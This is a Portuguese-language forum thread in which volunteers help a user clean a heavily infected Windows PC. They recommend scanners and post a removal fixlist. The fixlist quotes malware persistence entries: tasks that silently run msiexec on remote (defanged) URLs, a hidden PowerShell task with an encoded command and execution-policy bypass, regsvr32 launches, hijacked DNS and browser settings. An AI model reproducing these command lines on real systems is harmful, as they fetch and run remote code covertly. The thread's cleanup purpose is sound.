Logo Hardware.com.br
Responder
TmfeijoMMonroe
TmfeijoMMonr... Cyber Highlander Registrado
13.7K Mensagens 4.2K Curtidas
#2 Por TmfeijoMMonr...
22/03/2018 - 09:46
Bom dia prezado regente pleno; autor !

Roda estes assistentes:


A eset on line; marcando todas as opções em configurações avançadas.
https://www.eset.com/br/antivirus-domestico/online-scanner/
Depois a família malwarebytes:
Adwcleanerhttps://br.malwarebytes.com/adwcleaner/
JRThttps://www.bleepingcomputer.com/download/junkware-removal-tool/
E o próprio malwarebytes .

Fineza; poste os logs.
joram
joram Highlander Registrado
5.4K Mensagens 2.5K Curtidas
#3 Por joram
22/03/2018 - 11:51
/_ Bom Dia! zebrao _\

Sua máquina apresenta um alto volume de infecções! Neste caso recomendo algumas desinstalações,para seguirmos com um script fixlist menos volumoso e,de certa forma,menos sujeito a erros.
Vc possui 2 antivírus instalados,sendo que a Central de Segurança relaciona apenas o AVG. Portanto,recomendo a desinstalação do Avast e permanecendo o AVG.

> Desinstale: <13> Procure desinstalar o maior número possível destes softwares relacionados abaixo.
> Ps: Pode utilizar o RevoUninstaller em seu Modo Avançado.

Reimage Repair (HKLM\...\Reimage Repair) (Version: 1.8.7.2 - Reimage) <==== ATENÇÃO
AlphaGo (HKLM-x32\...\{2C652C0A-EC71-4797-8077-F67649177AB0}) (Version: 1.0.2 - Default Company Name)
AlphaGo (HKLM-x32\...\{51639FCA-678F-4D71-8044-E16E3D49187F}) (Version: 1.0.7 - Default Company Name)
AlphaGo (HKLM-x32\...\{97D2FBF4-72CF-4DD6-8DA8-26710BC7BE71}) (Version: 1.1.0 - Default Company Name)
AlphaGo (HKLM-x32\...\{B20B3A3C-91E3-4326-8A0F-B3C012574F8C}) (Version: 1.1.2 - Default Company Name)
AlphaGo (HKLM-x32\...\{B7CB7055-EFAE-4CD2-928A-15DB5F4FF7C7}) (Version: 1.2.5 - AlphaGo)
amulesw (HKLM-x32\...\{7CC4BD9A-10F3-432B-A037-AE9FCE1F9B64}) (Version: 1.0.8 - amules)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 17.9.2322 - AVAST Software)
BikaQ Rss (HKLM-x32\...\{3678D164-84DB-4F73-AFD6-916342E10764}) (Version: 3.0.17 - BikaQ)
deskapp (HKLM-x32\...\{6AD06984-E21B-436F-9341-11053320B994}) (Version: 1.1.4 - deskapp)
FromDocToPDF Internet Explorer Homepage and New Tab (HKU\S-1-5-21-3252762061-874905821-2166521-1000\...\FromDocToPDFTooltab Uninstall Internet Explorer) (Version: - Mindspark Interactive Network, Inc.)
SafeZone Stable 3.55.2393.607 (HKLM-x32\...\SafeZone 3.55.2393.607) (Version: 3.55.2393.607 - Avast Software) Hidden
WINSNARE (HKLM-x32\...\{56D19032-B59F-4020-994B-15912A49CD96}) (Version: 4.4.6 - WINSNARE)

> Baixe: < ZHPCleaner > < Imagem ... de Nicolas Coolman >

> Ou |Aqui!| << Mirror!

> Caso tenha algum impedimento ao download,assista este tutorial que foi postado no YouTube,para desativar o Windows SmartScreen.
> Estando na página,clique Imagem

> Salve-a ao desktop! ( ZHPCleaner.exe )
> Desabilite seu antivírus e execute ZHPCleaner.exe <<

Imagem

> Clique "Eu".

Imagem

> Clique Scanner.

Imagem

> Aguarde a conclusão!

Imagem

> Ao concluir,clique Reparar.
> Ps: Ignore possíveis alertas quanto à sua configuração de rede. (DNS)

Imagem

> Surgirão guias que estarão em vermelho,indicando problemas a serem reparados.
> Clique Reparar.

Imagem

> Ao concluir,clique Relatório!
> Poste o log de reparo: ~ Type : Reparo

> Baixe: < RogueKiller_portable32 > < Imagem > ( ... by Adlice Software ) ( 32 bits version )

> Baixe: < RogueKiller_portable64 > < Imagem > ( ... by Adlice Software ) ( 64 bits version )

> Salve-a ao desktop!
> Feche aplicativos que estejam abertos!
> Execute RogueKiller_portable32.exe ou RogueKiller_portable64.exe e aceite a Eula.
http://www.adlice.com/thanks-downloading-roguekiller/

> Feche esta página da Adlice Software,que lhe abre ao navegador.
> Ps: Se o "Filtro SmartScreen",do navegador IE,bloquear o anti-malware,clique em "Mais informações".
> À seguir,clique: "Executar de qualquer maneira"

Imagem

> Clique na guia "SCAN" >> "Start Scan".
> Aguarde a conclusão!

> Clique "Open Report" >> "Open TXT".
> Copie e poste o relatório! (Modo: Escanear)

[Abs]
Moderador - iMasters Fóruns - Segurança & Malwares
Administrador - Fórum SecSecurity
Administrador - Fórum PC Brasil
TmfeijoMMonroe
TmfeijoMMonr... Cyber Highlander Registrado
13.7K Mensagens 4.2K Curtidas
#4 Por TmfeijoMMonr...
22/03/2018 - 20:21
Mandastes bem joram; desinstalar o avast. Prezado autor siga meu post#2 too.

Naldo Volpe disse:
- No começo, em muitos anos atrás, o McAfee rodava em Modo: MS-DOS e era bem leve e o melhor dos Antivírus, agora é bem pesado e cheio
de coisas inúteis assim como o Norton...
- Eu particularmente não utilizo nenhum destes conhecidos como:
. Norton
. McAfee
. Avast
. AVG
. Panda

- O que Eu utilizo é o da própria Microsoft o MSE
joram
joram Highlander Registrado
5.4K Mensagens 2.5K Curtidas
#6 Por joram
23/03/2018 - 03:33
/_ TmfeijoMMonroe & Komm _\

Como a Central de Segurança não acusava o Avast instalado,tomei esta decisão.
Komm disse:
Como os dois antivírus são da Avast e usam o mesmo motor, tanto faz qual fique no micro. Pela lógica, saiu o que não estava ativo.

[]s.

Correto! isso_ai.png

"fixlist"
start
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restrição <==== ATENÇÃO
HKU\S-1-5-21-3252762061-874905821-2166521-1000\...\Run: [background_fault] => C:\Users\Alberto\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-27] (AVAST Software) <==== ATENÇÃO
HKU\S-1-5-21-3252762061-874905821-2166521-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj8xRTqcMUZWRkM8NTLWRTwyRWY1RTzQNTEyMWI8RWhQNH== /q <==== ATENÇÃO
HKU\S-1-5-21-3252762061-874905821-2166521-1000\...\MountPoints2: {0f6907b8-c1f0-11e6-b295-a11da8e2ef92} - G:\LaunchU3.exe -a
HKU\S-1-5-21-3252762061-874905821-2166521-1000\...\MountPoints2: {1e729a55-b5ac-11e6-8db6-a0f7b3479092} - F:\SETUP.EXE
HKLM\...\Providers\2lfq7cnq: C:\Program Files (x86)\Artatyvonas Server\local64spl.dll [309760 2017-02-10] () <==== ATENÇÃO
ShellExecuteHooks: Sem Nome - {E7869040-ECD1-11E6-AD72-64006A5CFC23} - -> Nenhum Arquivo
GroupPolicy: Restrição - Chrome <==== ATENÇÃO
Hosts: 0.0.0.0 csgob0t.online
Tcpip\Parameters: [NameServer] 82.163.143.176 82.163.142.178
Tcpip\..\Interfaces\{70A1E503-A1B0-4039-AF8D-CF8A10831A6F}: [NameServer] 82.163.143.176 82.163.142.178
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617912&ResetID=131419980414993468&GUID=2BFA0EDB-CCCC-4E4D-BA23-C102EAD4EF73
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617912&ResetID=131419980414993468&GUID=2BFA0EDB-CCCC-4E4D-BA23-C102EAD4EF73
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491400621&z=f72d583771601bc5b5e36a4gcz8tag9z1e6e9qbg3o&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491400621&z=f72d583771601bc5b5e36a4gcz8tag9z1e6e9qbg3o&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494332474&z=4c697805743c40d3fae48b5gaz9t1zbc9cfoez1m7z&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494332474&z=4c697805743c40d3fae48b5gaz9t1zbc9cfoez1m7z&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491400621&z=f72d583771601bc5b5e36a4gcz8tag9z1e6e9qbg3o&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491400621&z=f72d583771601bc5b5e36a4gcz8tag9z1e6e9qbg3o&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59&q={searchTerms}
HKU\S-1-5-21-3252762061-874905821-2166521-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493208084&z=2248de917a32b1f216db889gcz6t8ccoee0b2eabbc&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59&q={searchTerms}
HKU\S-1-5-21-3252762061-874905821-2166521-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617912&ResetID=131419980414993468&GUID=2BFA0EDB-CCCC-4E4D-BA23-C102EAD4EF73
HKU\S-1-5-21-3252762061-874905821-2166521-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494332474&z=4c697805743c40d3fae48b5gaz9t1zbc9cfoez1m7z&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59
HKU\S-1-5-21-3252762061-874905821-2166521-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493208084&z=2248de917a32b1f216db889gcz6t8ccoee0b2eabbc&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59&q={searchTerms}
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKU\S-1-5-21-3252762061-874905821-2166521-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493208084&z=2248de917a32b1f216db889gcz6t8ccoee0b2eabbc&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3252762061-874905821-2166521-1000 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = hxxps://mysearch.avg.com/search?cid={556BF2F8-8250-495E-9FD1-340CB13FBA87}&mid=0474ebf5ebbb47cf82155650b3207072-a1b23b70fa68d72b2434327a00be8c5aaf3de6c9&lang=pt-br&ds=AVG&coid=avgtbavg&cmpid=1117tb&pr=fr&d=2016-11-28 20:39:24&v=4.3.9.605&pid=wtu&sg=&sap=dsp&q={searchTerms}
StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.startpageing123.com/?type=sc&ts=1489487124&z=8dbb167110a3c976710ebf6g3z4bbt7z8b4m7g8o3c&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59
FF ProfilePath: C:\Users\Alberto\AppData\Roaming\Firefox\Firefox\Profiles\upb62k2h.default [2017-07-10] <==== ATENÇÃO
FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\40.3.8\\npsitesafety.dll [Nenhum Arquivo]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Nenhum Arquivo]
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.ourluckysites.com/?type=hp&ts=1491400621&z=f72d583771601bc5b5e36a4gcz8tag9z1e6e9qbg3o&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59"
CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.mystarting123.com/search/index.php?z=274b78dc8a407ee05c95b7fgbz4taw3qboao2eaz4b&q={searchTerms}
CHR DefaultSearchKeyword: ChromeDefaultData -> mystarting123
CHR Profile: C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2018-03-18] <==== ATENÇÃO
CHR HKU\S-1-5-21-3252762061-874905821-2166521-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [chfdnecihphmhljaaejmgoiahnihplgn] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
S2 3DM; C:\Users\Alberto\AppData\Local\3DM\Kitty.dll [754688 2017-04-20] () [Arquivo não assinado] <==== ATENÇÃO
S4 AMD; C:\Users\Alberto\AppData\Local\AMD\amd.exe [120320 2017-04-09] () [Arquivo não assinado] <==== ATENÇÃO
S2 CSHMDR; C:\Users\Alberto\AppData\Local\CSHMDR\Snare.dll [900096 2017-06-03] () [Arquivo não assinado] <==== ATENÇÃO
S4 glory; C:\Users\Alberto\AppData\Local\glory\glory.dll [809984 2017-06-12] () [Arquivo não assinado] <==== ATENÇÃO
R2 ReimageRealTimeProtector; C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [9037680 2018-02-08] (Reimage®)
S2 Themes; C:\Windows\system32\themeservice.dll [44544 2009-07-13] (Microsoft Corporation) [DependOnService: iThemes5]<==== ATENÇÃO
S4 WinSAPSvc; C:\Users\Alberto\AppData\Roaming\WinSAPSvc\WinSAP.dll [1887232 2017-06-10] () [Arquivo não assinado] <==== ATENÇÃO
U1 aswbdisk; não ImagePath
S1 onbckovf; \??\C:\Windows\system32\drivers\onbckovf.sys [X]
S1 p1487941280am; \??\C:\Users\Alberto\AppData\Local\Temp\bkA3D.tmp\p1487941280am.sys [X] <==== ATENÇÃO
S1 p1488241467am; \??\C:\Users\Alberto\AppData\Local\Temp\bk188F.tmp\p1488241467am.sys [X] <==== ATENÇÃO
S1 p1488381999am; \??\C:\Users\Alberto\AppData\Local\Temp\bkC5BF.tmp\p1488381999am.sys [X] <==== ATENÇÃO
S1 p1488537193am; \??\C:\Users\Alberto\AppData\Local\Temp\bk79C2.tmp\p1488537193am.sys [X] <==== ATENÇÃO
S1 p1488537241am; \??\C:\Users\Alberto\AppData\Local\Temp\bk360E.tmp\p1488537241am.sys [X] <==== ATENÇÃO
U2 snare; não ImagePath
U2 WinSnare; não ImagePath
2018-03-02 21:39 - 2018-03-18 11:47 - 000023364 _____ C:\Windows\System32\Tasks\{0E047847-0E7A-0B08-7811-0A050B7D1108}
2018-03-02 21:39 - 2018-03-02 21:40 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-4f15-0
2018-03-02 21:39 - 2018-03-02 21:40 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-2071-1
2018-03-02 21:39 - 2018-03-02 21:40 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-0df7-0
2018-03-02 21:39 - 2018-03-02 21:40 - 000000000 ____D C:\ProgramData\f0e8babc-4f15-0
2018-03-02 21:39 - 2018-03-02 21:40 - 000000000 ____D C:\ProgramData\f0e8babc-2071-1
2018-03-02 21:39 - 2018-03-02 21:40 - 000000000 ____D C:\ProgramData\f0e8babc-0df7-0
2018-03-02 21:39 - 2018-03-02 21:39 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-7bd5-1
2018-03-02 21:39 - 2018-03-02 21:39 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-26f3-0
2018-03-02 21:39 - 2018-03-02 21:39 - 000000000 ____D C:\ProgramData\f0e8babc-7bd5-1
2018-03-02 21:39 - 2018-03-02 21:39 - 000000000 ____D C:\ProgramData\f0e8babc-26f3-0
2018-03-02 21:38 - 2018-03-02 21:40 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-46f5-1
2018-03-02 21:38 - 2018-03-02 21:40 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-2ad3-1
2018-03-02 21:38 - 2018-03-02 21:40 - 000000000 ____D C:\ProgramData\f0e8babc-46f5-1
2018-03-02 21:38 - 2018-03-02 21:40 - 000000000 ____D C:\ProgramData\f0e8babc-2ad3-1
2018-03-02 21:38 - 2018-03-02 21:39 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-14b7-0
2018-03-02 21:38 - 2018-03-02 21:39 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-0a91-0
2018-03-02 21:38 - 2018-03-02 21:39 - 000000000 ____D C:\ProgramData\f0e8babc-14b7-0
2018-03-02 21:38 - 2018-03-02 21:39 - 000000000 ____D C:\ProgramData\f0e8babc-0a91-0
2018-03-02 21:38 - 2018-03-02 21:38 - 000000000 ____D C:\Users\Todos os Usuários\{5e47109f-612c-0}
2018-03-02 21:38 - 2018-03-02 21:38 - 000000000 ____D C:\Users\Todos os Usuários\{59db6f58-012c-1}
2018-03-02 21:38 - 2018-03-02 21:38 - 000000000 ____D C:\Users\Todos os Usuários\{2cc550cb-612c-0}
2018-03-02 21:38 - 2018-03-02 21:38 - 000000000 ____D C:\Users\Todos os Usuários\{0ab22f51-612c-0}
2018-03-02 21:38 - 2018-03-02 21:38 - 000000000 ____D C:\ProgramData\{5e47109f-612c-0}
2018-03-02 21:38 - 2018-03-02 21:38 - 000000000 ____D C:\ProgramData\{59db6f58-012c-1}
2018-03-02 21:38 - 2018-03-02 21:38 - 000000000 ____D C:\ProgramData\{2cc550cb-612c-0}
2018-03-02 21:38 - 2018-03-02 21:38 - 000000000 ____D C:\ProgramData\{0ab22f51-612c-0}
2018-01-21 20:41 - 2018-03-02 21:40 - 000000000 ____D C:\Users\Todos os Usuários\72808564
2018-01-21 20:41 - 2018-03-02 21:40 - 000000000 ____D C:\ProgramData\72808564
2018-01-21 20:41 - 2018-03-02 21:39 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-48c1-0
2018-01-21 20:41 - 2018-03-02 21:39 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-3e51-1
2018-01-21 20:41 - 2018-03-02 21:39 - 000000000 ____D C:\ProgramData\f0e8babc-48c1-0
2018-01-21 20:41 - 2018-03-02 21:39 - 000000000 ____D C:\ProgramData\f0e8babc-3e51-1
2018-01-21 20:40 - 2018-03-02 21:39 - 000000000 ____D C:\Users\Todos os Usuários\{70825560-212c-0}
2018-01-21 20:40 - 2018-03-02 21:39 - 000000000 ____D C:\Users\Todos os Usuários\{2b9a3d0a-512c-1}
2018-01-21 20:40 - 2018-03-02 21:39 - 000000000 ____D C:\ProgramData\{70825560-212c-0}
2018-01-21 20:40 - 2018-03-02 21:39 - 000000000 ____D C:\ProgramData\{2b9a3d0a-512c-1}
2018-01-15 19:21 - 2018-01-15 19:21 - 000001841 _____ C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
2018-03-18 11:47 - 2017-06-03 13:21 - 000000000 ____D C:\Program Files\Babylon
2018-03-18 11:47 - 2017-03-26 21:12 - 000003446 _____ C:\Windows\System32\Tasks\Reimage Reminder
2018-03-18 11:47 - 2017-03-26 21:11 - 000004282 _____ C:\Windows\System32\Tasks\ReimageUpdater
2018-03-18 11:47 - 2017-03-23 08:17 - 000004174 _____ C:\Windows\System32\Tasks\Antivirus Emergency Update
2018-03-18 11:47 - 2017-02-10 20:37 - 000001996 _____ C:\Windows\System32\Tasks\FkOAq9gSbo
2018-03-03 20:18 - 2017-03-26 21:10 - 000000000 ____D C:\Users\Todos os Usuários\Reimage Protector
2018-03-03 20:18 - 2017-03-26 21:10 - 000000000 ____D C:\ProgramData\Reimage Protector
2018-02-26 09:17 - 2017-03-26 21:09 - 000000150 _____ C:\Windows\Reimage.ini
2018-02-16 15:20 - 2017-02-08 18:05 - 000002992 _____ C:\Windows\System32\Tasks\{871EF200-6F5B-4885-A34F-FDF0D1AAA370}
2018-02-16 15:20 - 2016-12-07 13:28 - 000002962 _____ C:\Windows\System32\Tasks\{F75B7A0E-CB4A-48FC-BFA8-0428742939DA}
2018-02-16 15:20 - 2016-12-07 13:28 - 000002962 _____ C:\Windows\System32\Tasks\{E8639AB9-3524-407F-B876-50078F8DD31A}
2018-02-16 15:20 - 2016-12-07 13:28 - 000002962 _____ C:\Windows\System32\Tasks\{22119429-0312-47F7-8AFF-61EC9F1D4C18}
2018-02-16 15:20 - 2016-11-28 18:39 - 000003186 _____ C:\Windows\System32\Tasks\{D2463716-0646-41A9-AA94-88EE59669D33}
2018-02-16 15:20 - 2016-11-28 16:52 - 000003140 _____ C:\Windows\System32\Tasks\{3148CD70-41D8-442B-8AC5-D820CF6D51FB}
2017-08-28 12:33 - 2017-08-28 12:33 - 020118528 _____ (Adobe Systems Incorporated) C:\Users\Alberto\AppData\Local\Temp\FlashPlayerUpdate.exe
2017-07-29 18:28 - 2018-01-15 19:20 - 014769392 _____ (Reimage) C:\Users\Alberto\AppData\Local\Temp\ReimagePackage.exe
2018-01-15 19:19 - 2018-01-15 19:19 - 000605376 _____ (Reimage) C:\Users\Alberto\AppData\Local\Temp\ReimageRepair.exe
2018-03-18 11:47 - 2017-07-23 06:02 - 000468488 _____ (Babylon Software Ltd.) C:\Users\Alberto\AppData\Local\Temp\uninstbb.exe
HKU\S-1-5-21-3252762061-874905821-2166521-1000\...\ChromeHTML: -> C:\Program Files (x86)\Hotleaf\Application\chrome.exe (Google Inc.) <==== ATENÇÃO
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-01-06] (AVAST Software)
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-01-06] (AVAST Software)
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-01-06] (AVAST Software)
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-01-06] (AVAST Software)
ContextMenuHandlers3: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-01-06] (AVAST Software)
Task: {08C34B56-F487-4C0E-90E0-ED464BDD8F78} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe
Task: {1424C6B0-E191-4B33-BB99-676485972781} - System32\Tasks\Reimage Reminder => C:\Program Files\Reimage\Reimage Repair\ReimageReminder.exe [2017-12-05] (Reimage ltd.) <==== ATENÇÃO
Task: {1DC9C17B-1CD1-4343-988E-06522CA10419} - \{0C7A0847-0C0C-097E-0A11-0F797A0E117D} -> Nenhum Arquivo <==== ATENÇÃO
Task: {3C1EDDF4-62E1-4E44-941D-48C1943476BC} - System32\Tasks\{0E047847-0E7A-0B08-7811-0A050B7D1108} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (a entrada de dados tem 9520 mais caracteres). <==== ATENÇÃO
Task: {42CDC4AE-023D-4EB7-AEDF-F39FF7FB33BD} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [2018-01-06] (AVAST Software)
Task: {44E114DB-A92A-4CD3-9549-3E49EA9535EC} - System32\Tasks\One System Care Task => C:\PROGRA~2\ONESYS~1\SYSTEM~1.EXE <==== ATENÇÃO
Task: {517C44BD-C1DB-4FE6-95B7-89E4C3D29E09} - System32\Tasks\FkOAq9gSbo => C:\Program Files (x86)\2Dig1jJ6jw\updengine.exe <==== ATENÇÃO
Task: {6793D145-3A79-49FC-B870-51FC1C2AA1C6} - System32\Tasks\Tahophwovesp => msiexec /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST9500325AS_5VE73X59XXXX5VE73X59&v=2017210 /q <==== ATENÇÃO
Task: {6E199AE4-9123-4CAC-9E1E-E51A571C1FDF} - System32\Tasks\{D2463716-0646-41A9-AA94-88EE59669D33} => C:\Windows\system32\pcalua.exe -a C:\Users\Alberto\AppData\Local\Temp\dt_9188.tmp.exe -d "C:\Program Files\DAEMON Tools Lite" <==== ATENÇÃO
Task: {7E1C9183-9BEB-407B-8D1B-18BCFA1E125B} - System32\Tasks\Artatyvonas Server => C:\Program Files (x86)\Pluteward\qihick.exe [2017-02-10] (Glarysoft Ltd)
Task: {8447145B-706C-40D3-9D1B-A74D4C4463B9} - System32\Tasks\{3148CD70-41D8-442B-8AC5-D820CF6D51FB} => C:\Windows\system32\pcalua.exe -a C:\Users\Alberto\Desktop\IN2WLN48WW5.exe -d C:\Users\Alberto\Desktop
Task: {845C0333-2D19-44BF-A8B7-102035C32577} - System32\Tasks\15932452-3719-5A40-32B4-66F45C14D074 => C:\Windows\SysWOW64\regsvr32.exe /n /s /i:"/1049ca3fa785db4d /q" "C:\Users\Alberto\AppData\Local\CA10DB90-B716-55BF-5176-95045940D171\{25C1E671-6315-5741-E13D-D1EF03D4FE02}.."
Task: {89EE51D7-96B6-43BC-96CA-6C62DBD744E5} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe <==== ATENÇÃO
Task: {8C0583A0-5FA6-4476-969F-5B8171DD4874} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2018-02-08] (Reimage®) <==== ATENÇÃO
Task: {B37F0BD0-9D6D-4981-8294-CAB72EC032F5} - \{D82F247D-697A-4898-BCBA-E8F025619A6F} -> Nenhum Arquivo <==== ATENÇÃO
Task: {B53EA85D-352A-4C03-93ED-90244F4ABF80} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () <==== ATENÇÃO
Task: {B54D2A19-17D4-4EFD-B854-50BEDF0E035A} - System32\Tasks\BikaQ_FetchAndUpgrade_CanBeDel => C:\Program Files (x86)\BikaQRss\BikaQ.exe [2017-03-21] (IEC) <==== ATENÇÃO
Task: {B77F0830-148E-4694-9B09-E41A301A7FC2} - System32\Tasks\One System Care Run Delay => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATENÇÃO
Task: {C7E14202-8FE5-4F62-B72A-82ED69580644} - System32\Tasks\{08643964-85D9-40D4-AB8E-C5CF637DF18B} => C:\Windows\system32\pcalua.exe -a D:\setup.exe -d D:\
Task: {C9717560-4E6D-4655-89EB-BCFCB7B0E2DC} - System32\Tasks\Windows-PG => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\psgo\psgo.ps1 <==== ATENÇÃO
Task: {D96FBEBB-3B1B-430D-A611-2F357CBAC738} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2018-01-06] (AVAST Software)
Shortcut: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Standuck\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\88ed70759ffebbd3\Google Chrome.lnk -> C:\Program Files (x86)\Hotleaf\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk -> C:\Program Files (x86)\Hotleaf\Application\chrome.exe (Google Inc.)
ShortcutWithArgument: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1491400621&z=f72d583771601bc5b5e36a4gcz8tag9z1e6e9qbg3o&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59
